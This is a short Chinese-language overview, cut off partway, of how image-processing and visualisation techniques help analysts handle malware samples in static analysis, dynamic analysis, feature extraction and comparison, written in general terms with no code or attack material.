一、恶意代码分析的挑战恶意代码的种类繁多，形式多样，对于分析人员来说，面对海量的样本和复杂的特征，往往需要耗费大量的精力和时间。

在这个过程中，图像处理技术的应用可以提供一种快速且高效的手段，帮助分析人员更好地理解恶意代码，并作出相应的处理。

二、图像处理技术的应用1. 静态分析静态分析是恶意代码分析的基础，通过对恶意代码进行反汇编和反编译，分析其代码结构和执行逻辑。

然而，由于代码的复杂性和密集性，这种方法往往需要大量的时间和人力。

而图像处理技术可以通过可视化的方式展示代码的结构和逻辑，帮助分析人员更好地理解和分析。

2. 动态分析动态分析是恶意代码分析的重要手段，通过监控恶意代码在真实环境中的执行行为，可以获得更多的行为特征和动态信息。

然而，在处理大量的数据时，分析人员面临着信息的过载和疲劳。

而图像处理技术可以将这些数据以图像的形式展示，帮助分析人员更好地观察和理解恶意代码的行为，快速发现异常和威胁。

3. 特征提取恶意代码的特征提取是恶意代码分析中的关键环节，它有助于识别和分类不同的恶意代码。

而图像处理技术可以通过特征提取算法，将恶意代码的关键特征提取出来，并以图像的形式展示。

这样一来，分析人员可以直观地观察和比较不同恶意代码之间的特征差异，从而更好地进行分类和分析。

4. 可视化分析恶意代码分析的过程通常是繁琐而复杂的，需要处理大量的数据和信息。

而图像处理技术可以将这些数据和信息以可视化的方式展示，帮助分析人员更好地理解和分析。

通过图像的形式，分析人员可以直观地观察和比较不同样本之间的相似和差异，从而更好地理解和解释分析结果。

三、图像处理技术的发展与挑战随着恶意代码的不断演化和进化，图像处理技术也面临着新的挑战和需求。

首先，恶意代码的复杂性和多样性要求图像处理技术能够适应不同的数据类型和形式。